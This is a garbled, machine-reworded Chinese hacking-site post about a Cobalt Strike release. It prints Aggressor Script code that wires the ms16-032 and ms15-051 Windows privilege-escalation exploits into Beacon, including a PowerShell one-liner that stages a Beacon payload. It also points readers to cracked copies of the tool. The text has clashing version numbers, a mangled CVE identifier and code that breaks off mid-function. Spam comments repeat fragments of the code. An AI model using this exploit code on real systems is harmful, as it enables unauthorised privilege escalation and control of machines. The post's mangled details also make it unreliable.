提权利器Cobalt Strike发布3.6版本

提权利器Cobalt Strike发布3.6版本

黑客软件hacker2019-06-27 8:21:3912775A+A-

提权利器Cobalt Strike发布3.6版本 第1张

"介绍

Cobalt Strike 3.7版本号早已宣布公布,此版本号增加了1个用以启用Beacon的第三方平台提权漏洞利用程序流程的API,并拓展Malleable C5以适用不应用.com POST的.com C&C。一起该版本号还对以前版本号中存在的不足开展了修补和改善。现阶段在网上能寻找3.6版本号的破译版本号,有关破译及其专用工具应用方法在FK上資源还是比较多的。

CobaltStrike最新版本极致破译方式

怎么制作Cobalt Strike v2.9破解版下载

在Kali 2.2下安裝破译最新版本Cobalt Strike

有关剖析Cobalt Strike的beacon.dll的某些TIPS

提权API

此版本号增加了1个API将提支配权用程序流程集成化到Beacon的elevate指令。

下边以FuzzySec发觉的ms16-032系统漏洞为事例,将变形的PowerShell Empire集成化到Beacon中:

sub ms16_032_exploit { local('$script $oneliner'); # acknowledge this command btask($1, ""Tasked Beacon To run "" . listener_describe($2) . "" via ms16-032""); # generate a PowerShell script To run our Beacon listener $script = artifact($2, ""powershell""); # host this script within this Beacon $oneliner = beacon_host_script($1, $script); # task Beacon To run this exploit with our one-liner that runs Beacon bpowershell_import!($1, script_resource(""modules/Invoke-MS16032.ps1""));

    bpowerpick!($1, ""Invoke-MS16032 -Command \"" $+ $oneliner $+ \""""); # give It another 12s To work. bpause($1, 12000); # handle staging bstage($1, $null, $2);

}

beacon_exploit_register(""ms16-032"", ""Secondary Logon Handle Privilege Escalation (CVE-2018-099)"", &ms16_032_exploit); 

接下去,人们试一下其他。Metasploit架构运用了很多按照反射面DLL(Reflective DLLs)引入基本原理提权的exploit。

Metasploit提支配权用进攻的步骤

最先转化成1个patsy系统进程,次之将exploit打针到patsy系统进程,以后将stager shellcode payload打针到patsy系统进程,最终运作exploit DLL时根据1个表针对准早已进行打针的shellcode。

将会你能有疑惑,是不是还能在Beacon中应用这种DLL?归功于Aggressor Script中的bdllspawn涵数人们依然能够在Beacon中应用这种DLL。这一函数调用1个功效于Beacon    post-exploitatio的反射面DLL,它能够向DLL传送1个随意主要参数,而且能够监控器规范輸出。

下列脚本制作为应用ms15_051_client_copy_image的Beacon payload:

sub ms15_051_exploit { # acknowledge this command btask($1, ""Task Beacon To run "" . listener_describe($2) . "" via ms15-051""); # tune our parameters based On the target cite if (-is64 $1) {

        $cite   = ""x64"";

        $dll    = ""modules/cve-2014年-1701.x64.dll"";

    } else {

        $cite   = ""x86"";

        $dll    = ""modules/cve-2014年-1701.x86.dll"";


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 瑰颈尝蛊2022-05-28 05:12:30
  • command btask($1, ""Tasked Beacon To run "" . listener_describe($2) . "" via ms16-032"");
  • 青迟未芩2022-05-28 00:49:42
  • it with our one-liner that runs Beacon bpowershell_import!($1, script_resource(""modules/Invoke-MS16032.ps1""));    b
  • 余安颇倔2022-05-28 04:15:07
  • = ""x86"";        $dll    = ""
  • 鹿岛羁客2022-05-28 04:34:14
  • condary Logon Handle Privilege Escalation (CVE-2018-099)"", &ms16_032_exploit);  接下去,人们试一下其他。Metasploit架构运用了很多按
  • 离鸢七禾2022-05-27 21:02:55
  •         $cite   = ""x86"";  &

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理